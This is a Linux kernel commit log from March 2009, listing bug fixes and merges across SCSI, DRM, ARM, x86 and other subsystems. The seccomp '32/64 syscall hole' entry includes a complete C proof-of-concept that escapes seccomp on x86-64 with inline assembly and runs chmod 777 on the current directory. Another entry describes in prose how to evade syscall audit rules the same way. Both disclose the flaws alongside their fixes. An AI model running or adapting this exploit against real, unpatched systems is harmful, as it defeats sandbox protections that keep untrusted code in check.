aboutsummaryrefslogtreecommitdiff
AgeCommit message (Collapse)Author
2009-03-06[SCSI] libfc: check for err when recv and state is incorrectRobert Love
If we've just created an interface and the an rport is logging in we may have a request on the wire (say PRLI). If we destroy the interface, we'll go through each rport on the disc->rports list and set each rport's state to NONE. Then the lport will reset the EM. The EM reset will send a CLOSED event to the prli_resp() handler which will notice that the state != PRLI. In this case it frees the frame pointer, decrements the refcount and unlocks the rport. The problem is that there isn't a frame in this case. It's just a pointer with an embedded error code. The free causes an Oops. This patch moves the error checking to be before the state checking. Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: rename rp to rdata in fc_disc_new_target()Robert Love
Just rename the variable as per our naming convention. Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: correct RPORT_TO_PRIV usageRobert Love
We only need to use this macro when assigning a value to rport->dd_data. All other accesses should just use dd_data. Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: Don't violate transport template for rogue port creationRobert Love
Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: exch mgr is freed while lport still retrying sequencesSteve Ma
When a sequence cannot be delivered to the target, the local port will schedule retries, While this process is in progress, if we destroy the FCoE interface, the fcoe_sw_destroy routine is entered, and the fc_exch_mgr_free(lp->emp) is called. Thus if fc_exch_alloc() is called when retrying the sequence, the mempool_alloc() will fail to allocate the exchange because the mempool of the exchange manager has already been released. This patch is to cancel any pending retry work of the local port before we start to destroy the interface. Also, when resetting the local port, we should also stop the scheduled pending retries. Signed-off-by: Steve Ma <steve.ma@intel.com> Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: fixed a read IO data integrity issue when a IO data frame lostVasu Dev
The fc_fcp_complete_locked detected data underrun in this case and set the FC_DATA_UNDRUN but that was ignored by fc_io_compl for all cases including read underrun. Added code to not to ignore FC_DATA_UNDRUN for read IO and instead suggested scsi-ml to retry cmd to recover from lost data frame. Not sure if it is okay to ignore FC_DATA_UNDRUN for other case, so let code as is for other cases but removed or-ing with zero valued fsp->cdb_status for those cases. Signed-off-by: Vasu Dev <vasu.dev@intel.com> Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: rport retry on LS_RJT from certain ELSChris Leech
This allows any rport ELS to retry on LS_RJT. The rport error handling would only retry on resource allocation failures and exchange timeouts. I have a target that will occasionally reject PLOGI when we do a quick LOGO/PLOGI. When a critical ELS was rejected, libfc would fail silently leaving the rport in a dead state. The retry count and delay are managed by fc_rport_error_retry. If the retry count is exceeded fc_rport_error will be called. When retrying is not the correct course of action, fc_rport_error can be called directly. Signed-off-by: Chris Leech <christopher.leech@intel.com> Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc, fcoe: fixed locking issues with lport->lp_mutex around ↵Vasu Dev
lport->link_status The fcoe_xmit could call fc_pause in case the pending skb queue len is larger than FCOE_MAX_QUEUE_DEPTH, the fc_pause was trying to grab lport->lp_muex to change lport->link_status and that had these issues :- 1. The fcoe_xmit was getting called with bh disabled, thus causing "BUG: scheduling while atomic" when grabbing lport->lp_muex with bh disabled. 2. fc_linkup and fc_linkdown function calls lport_enter function with lport->lp_mutex held and these enter function in turn calls fcoe_xmit to send lport related FC frame, e.g. fc_linkup => fc_lport_enter_flogi to send flogi req. In this case grabbing the same lport->lp_mutex again in fc_puase from fcoe_xmit would cause deadlock. The lport->lp_mutex was used for setting FC_PAUSE in fcoe_xmit path but FC_PAUSE bit was not used anywhere beside just setting and clear this bit in lport->link_status, instead used a separate field qfull in fc_lport to eliminate need for lport->lp_mutex to track pending queue full condition and in turn avoid above described two locking issues. Also added check for lp->qfull in fc_fcp_lport_queue_ready to trigger SCSI_MLQUEUE_HOST_BUSY when lp->qfull is set to prevent more scsi-ml cmds while lp->qfull is set. This patch eliminated FC_LINK_UP and FC_PAUSE and instead used dedicated fields in fc_lport for this, this simplified all related conditional code. Also removed fc_pause and fc_unpause functions and instead used newly added lport->qfull directly in fcoe. Signed-off-by: Vasu Dev <vasu.dev@intel.com> Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: fixed a soft lockup issue in fc_exch_recv_abtsVasu Dev
The fc_seq_start_next grabs ep->ex_lock but this lock was already held here, so instead called fc_seq_start_next_locked to avoid soft lockup. Signed-off-by: Vasu Dev <vasu.dev@intel.com> Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: handle RRQ exch timeoutVasu Dev
Cleanup exchange held due to RRQ when RRQ exch times out, in this case the ABTS is already done causing RRQ req therefore proceeding with cleanup in fc_exch_rrq_resp should be okay to restore exch resource. Signed-off-by: Vasu Dev <vasu.dev@intel.com> Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: when rport goes away (re-plogi), clean up exchanges to/from rportAbhijeet Joglekar
When a rport goes away, libFC does a plogi which will reset exchanges at the rport. Clean exchanges at our end, both in transport and libFC. If transport hooks into exch_mgr_reset, it will call back into fc_exch_mgr_reset() to clean up libFC exchanges. Signed-off-by: Abhijeet Joglekar <abjoglek@cisco.com> Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-06[SCSI] libfc: Pass lport in exch_mgr_resetAbhijeet Joglekar
fc_exch_mgr structure is private to fc_exch.c. To export exch_mgr_reset to transport, transport needs access to the exch manager. Change exch_mgr_reset to use lport param which is the shared structure between libFC and transport. Alternatively, fc_exch_mgr definition can be moved to libfc.h so that lport can be accessed from mp*. Signed-off-by: Abhijeet Joglekar <abjoglek@cisco.com> Signed-off-by: Robert Love <robert.w.love@intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-05[SCSI] sd: Don't try to spin up drives that are connected to an inactive portMatthew Wilcox
We currently try to spin up drives connected to standby and unavailable ports. This will never succeed and wastes a lot of time. Fail quickly if the sense data reports the port is in standby or unavailable state. Reported-by: Narayanan Rengarajan <narayanan.rengarajan@hp.com> Tested-by: Narayanan Rengarajan <narayanan.rengarajan@hp.com> Signed-off-by: Matthew Wilcox <willy@linux.intel.com> Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
2009-03-04Merge branch 'merge' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/benh/powerpc * 'merge' of git://git.kernel.org/pub/scm/linux/kernel/git/benh/powerpc: powerpc: Run sbc610 USB fixup code only on the appropriate platform.
2009-03-04drm: fix double lock typoHelge Bahmann
[airlied: you shall not retype patches from other trees half asleep] Signed-of-by: Dave Airlie <airlied@redhat.com>
2009-03-04powerpc: Run sbc610 USB fixup code only on the appropriate platform.Tony Breeds
commit a969e76a7101bf5f3d369563df1ca1253dd6131b (powerpc: Correct USB support for GE Fanuc SBC610) introduced a fixup for NEC usb controllers. This fixup should only run on GEF SBC610 boards. Fixes Fedora bug #486511. (https://bugzilla.redhat.com/show_bug.cgi?id=486511) Signed-off-by: Tony Breeds <tony@bakeyournoodle.com> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
2009-03-03Linux 2.6.29-rc7Linus Torvalds
2009-03-03Merge git://git.kernel.org/pub/scm/linux/kernel/git/herbert/crypto-2.6Linus Torvalds
* git://git.kernel.org/pub/scm/linux/kernel/git/herbert/crypto-2.6: crypto: ixp4xx - Fix qmgr_request_queue build failure crypto: api - Fix module load deadlock with fallback algorithms
2009-03-04crypto: ixp4xx - Fix qmgr_request_queue build failureKrzysztof Hałasa
There is another user of IXP4xx queue manager, fix it. Signed-off-by: Krzysztof Hałasa <khc@pm.waw.pl> Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
2009-03-03Merge branch 'sched-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'sched-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: sched: don't allow setuid to succeed if the user does not have rt bandwidth sched_rt: don't start timer when rt bandwidth disabled
2009-03-03Merge branch 'x86-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: x86: oprofile: don't set counter width from cpuid on Core2 x86: fix init_memory_mapping() to handle small ranges
2009-03-03Merge branch 'tracing/mmiotrace' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'tracing/mmiotrace' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: x86 mmiotrace: fix race with release_kmmio_fault_page() x86 mmiotrace: improve handling of secondary faults x86 mmiotrace: split set_page_presence() x86 mmiotrace: fix save/restore page table state x86 mmiotrace: WARN_ONCE if dis/arming a page fails x86: add far read test to testmmiotrace x86: count errors in testmmiotrace.ko
2009-03-03Merge branch 'core-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'core-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: rcu: Teach RCU that idle task is not quiscent state at boot
2009-03-03Merge master.kernel.org:/home/rmk/linux-2.6-armLinus Torvalds
* master.kernel.org:/home/rmk/linux-2.6-arm: [ARM] fix lots of ARM __devexit sillyness [ARM] 5417/1: Set the correct cacheid for ARMv6 CPUs with ARMv7 style MMU [ARM] 5416/1: Use unused address in v6_early_abort [ARM] 5411/1: S3C64XX: Fix EINT unmask [ARM] at91: fix for Atmel AT91 powersaving [ARM] RiscPC: Fix etherh oops
2009-03-03[ARM] fix lots of ARM __devexit sillynessRussell King
`iop_adma_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o `mv_xor_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o `mv64xxx_i2c_unmap_regs' referenced in section `.devinit.text' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o `mv64xxx_i2c_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o `orion_nand_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o `pxafb_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de> Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
2009-03-03[ARM] 5417/1: Set the correct cacheid for ARMv6 CPUs with ARMv7 style MMUCatalin Marinas
The cacheid_init() function assumes that if cpu_architecture() returns 7, the caches are VIPT_NONALIASING. The cpu_architecture() function returns the version of the supported MMU features (e.g. TEX remapping) but it doesn't make any assumptions about the cache type. The patch adds the checking of the Cache Type Register for the ARMv7 format. Signed-off-by: Catalin Marinas <catalin.marinas@arm.com> Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
2009-03-03[ARM] 5416/1: Use unused address in v6_early_abortSeth Forshee
The target of the strex instruction to clear the exlusive monitor is currently the top of the stack. If the store succeeeds this corrupts r0 in pt_regs. Use the next stack location instead of the current one to prevent any chance of corrupting an in-use address. Signed-off-by: Seth Forshee <seth.forshee@gmail.com> Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
2009-03-03x86: oprofile: don't set counter width from cpuid on Core2Tim Blechmann
Impact: fix stuck NMIs and non-working oprofile on certain CPUs Resetting the counter width of the performance counters on Intel's Core2 CPUs, breaks the delivery of NMIs, when running in x86_64 mode. This should fix bug #12395: http://bugzilla.kernel.org/show_bug.cgi?id=12395 Signed-off-by: Tim Blechmann <tim@klingt.org> Signed-off-by: Robert Richter <robert.richter@amd.com> LKML-Reference: <20090303100412.GC10085@erda.amd.com> Cc: <stable@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-03x86: fix init_memory_mapping() to handle small rangesYinghai Lu
Impact: fix failed EFI bootup in certain circumstances Ying Huang found init_memory_mapping() has problem with small ranges less than 2M when he tried to direct map the EFI runtime code out of max_low_pfn_mapped. It turns out we never considered that case and didn't check the range... Reported-by: Ying Huang <ying.huang@intel.com> Signed-off-by: Yinghai Lu <yinghai@kernel.org> Cc: Brian Maly <bmaly@redhat.com> LKML-Reference: <49ACDDED.1060508@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-02Revert "menu: fix embedded menu snafu"Linus Torvalds
This reverts commit 155b25bcc28631a5b5230191aa3f56c40dfffa3f, which was totally wrong - the "embedded" options still exists (very much so) even on non-embedded platforms. It's just that we don't bother with actually asking about them when we're not embedded, we just take their default values (which is usually 'y' - the options add features that may not be worth it in a constrained environment). Noticed-by: Andrew Morton <akpm@linux-foundation.org> Cc: Randy Dunlap <randy.dunlap@oracle.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02Merge branch 'drm-fixes' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/airlied/drm-2.6 * 'drm-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/airlied/drm-2.6: drm/i915: Fix use-before-null-check in i915_irq_emit(). drm: Avoid client deadlocks when the master disappears. drm: Wake up all lock waiters when the master disappears. drm: Don't return ERESTARTSYS to user-space.
2009-03-03drm/i915: Fix use-before-null-check in i915_irq_emit().Eric Anholt
This could be triggered by a client asking to emit an irq when the device wasn't initialized. Signed-off-by: Eric Anholt <eric@anholt.net> Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03drm: Avoid client deadlocks when the master disappears.Thomas Hellstrom
This is done by 1) Wake up lock waiters when we close the master file descriptor. Not when the master structure is removed, since the latter requires the waiters themselves to release the refcount on the master structure -> Deadlock. 2) Send a SIGTERM to all clients waiting for the lock. Normally these clients will get a SIGPIPE when the X server dies, but clients may also spin trying to grab the DRM lock, without getting any sort of notification. Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com> Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03drm: Wake up all lock waiters when the master disappears.Thomas Hellstrom
Currently only one waiter is woken up, leaving other waiters hanging waiting for the DRM lock. Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com> Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03drm: Don't return ERESTARTSYS to user-space.Thomas Hellstrom
That return code is for in-kernel use only. Use EINTR instead. Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com> Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-02menu: fix embedded menu snafuRandy Dunlap
The COMPAT_BRK kconfig symbol does not depend on EMBEDDED, but it is in the midst of the EMBEDDED menu symbols, so it mucks up the EMBEDDED menu. Fix by moving it to just after all of the EMBEDDED menu symbols. Also, surround all of the EMBEDDED symbols with "if EMBEDDED"/"endif" so that this EMBEDDED block is clearer. Signed-off-by: Randy Dunlap <randy.dunlap@oracle.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02Merge branch 'for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/drzeus/mmc * 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/drzeus/mmc: sdhci: Add NO_BUSY_IRQ quirk for Marvell CAFE host chip sdhci: Add quirk for controllers with no end-of-busy IRQ
2009-03-02Merge branch 'fix/hda' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound-2.6 * 'fix/hda' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound-2.6: ALSA: hda - Add probe_mask default for Toshiba laptop with ALC268 ALSA: hda - Add quirk for new HP xw series ALSA: hda - Fix digital mic on dell-m4-1 and dell-m4-3
2009-03-02Merge branch 'x86-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: fix warning in io_mapping_map_wc() x86: i915 needs pgprot_writecombine() and is_io_mapping_possible()
2009-03-02Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6Linus Torvalds
* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (29 commits) zaurus: add usb id for motomagx phones usbnet: make usbnet_get_link() fall back to ethtool_op_get_link() veth: Fix carrier detect cdc_ether: add usb id for Ericsson F3507g r8169: read MAC address from EEPROM on init (2nd attempt) tcp: fix retrans_out leaks net headers: export dcbnl.h net headers: cleanup dcbnl.h netpoll: Add drop checks to all entry points gianfar: Do right check on num_txbdfree pkt_sched: sch_drr: Fix oops in drr_change_class. b44: Disable device on shutdown b44: Unconditionally enable interrupt routing on reset net: fix hp-plus build error libertas: fix misuse of netdev_priv() and dev->ml_priv ipv6: don't use tw net when accounting for recycled tw asix: new device ids tcp_scalable: Update malformed & dead url netfilter: xt_recent: fix proc-file addition/removal of IPv4 addresses netxen: handle pci bar 0 mapping failure ...
2009-03-02Merge branch 'for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/jmorris/security-testing-2.6 * 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/jmorris/security-testing-2.6: selinux: Fix a panic in selinux_netlbl_inode_permission()
2009-03-02Change email addressKarsten Keil
Since I will loose the old address soon, please change it. Signed-off-by: Karsten Keil <kkeil@linux-pingi.de> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02Merge branch 'for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input * 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input: Input: elantech - touchpad driver miss-recognising logitech mice Input: synaptics - ensure we reset the device on resume Input: usbtouchscreen - fix eGalax HID ignoring Input: ambakmi - fix timeout handling in amba_kmi_write() Input: pxa930_trkball - fix write timeout handling Input: struct device - replace bus_id with dev_name(), dev_set_name() Input: bf54x-keys - fix debounce time validation Input: spitzkbd - mark probe function as __devinit Input: omap-keypad - mark probe function as __devinit Input: corgi_ts - mark probe function as __devinit Input: corgikbd - mark probe function as __devinit Input: uvc - the button on the camera is KEY_CAMERA Input: psmouse - make MOUSE_PS2_LIFEBOOK depend on X86 Input: atkbd - make forced_release_keys[] static Input: usbtouchscreen - allow reporting calibrated data
2009-03-02Merge branch 'for_linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4 * 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4: ext4: don't call jbd2_journal_force_commit_nested without journal ext4: Reorder fs/Makefile so that ext2 root fs's are mounted using ext2 ext4: Remove duplicate call to ext4_commit_super() in ext4_freeze()
2009-03-02Merge git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6Linus Torvalds
* git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6: [SCSI] mpt: fix disable lsi sas to use msi as default [SCSI] fix ABORTED_COMMAND looping forever problem [SCSI] sd: revive sd_index_lock [SCSI] cxgb3i: update the driver version to 1.0.1 [SCSI] cxgb3i: Fix spelling errors in documentation [SCSI] cxgb3i: added missing include in cxgb3i_ddp.h [SCSI] cxgb3i: Outgoing pdus need to observe skb's MAX_SKB_FRAGS [SCSI] cxgb3i: added per-task data to track transmit progress [SCSI] cxgb3i: transmit work-request fixes [SCSI] hptiop: Add new PCI device ID
2009-03-02x86-64: seccomp: fix 32/64 syscall holeRoland McGrath
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02x86-64: syscall-audit: fix 32/64 syscall holeRoland McGrath
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases, audit_syscall_entry() will use the wrong system call number table and the wrong system call argument registers. This could be used to circumvent a syscall audit configuration that filters based on the syscall numbers or argument details. Signed-off-by: Roland McGrath <roland@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02sdhci: Add NO_BUSY_IRQ quirk for Marvell CAFE host chipAndres Salomon
As described here: http://lkml.org/lkml/2009/2/20/265 The CAFE chip is broken due to commit e809517f6fa5803a5a1cd5602. Anton added a quirk here: http://lkml.org/lkml/2009/2/20/279 that fixes CAFE's problem. This adds the quirk for CAFE. Signed-off-by: Andres Salomon <dilinger@debian.org> Signed-off-by: Pierre Ossman <drzeus@drzeus.cx>
2009-03-02sdhci: Add quirk for controllers with no end-of-busy IRQBen Dooks
The Samsung SDHCI (and FSL eSDHC) controller block seems to fail to generate an INT_DATA_END after the transfer has completed and the bus busy state finished. Changes in e809517f6fa5803a5a1cd56026f0e2190fc13d5c to use the new busy method are the cause of the behaviour change. Signed-off-by: Ben Dooks <ben-linux@fluff.org> Signed-off-by: Anton Vorontsov <avorontsov@ru.mvista.com> Signed-off-by: Pierre Ossman <drzeus@drzeus.cx>
2009-03-02x86 mmiotrace: fix race with release_kmmio_fault_page()Pekka Paalanen
There was a theoretical possibility to a race between arming a page in post_kmmio_handler() and disarming the page in release_kmmio_fault_page(): cpu0 cpu1 ------------------------------------------------------------------ mmiotrace shutdown enter release_kmmio_fault_page fault on the page disarm the page disarm the page handle the MMIO access re-arm the page put the page on release list remove_kmmio_fault_pages() fault on the page page not known to mmiotrace fall back to do_page_fault() *KABOOM* (This scenario also shows the double disarm case which is allowed.) Fixed by acquiring kmmio_lock in post_kmmio_handler() and checking if the page is being released from mmiotrace. Signed-off-by: Pekka Paalanen <pq@iki.fi> Cc: Stuart Bennett <stuart@freedesktop.org> Cc: Steven Rostedt <rostedt@goodmis.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>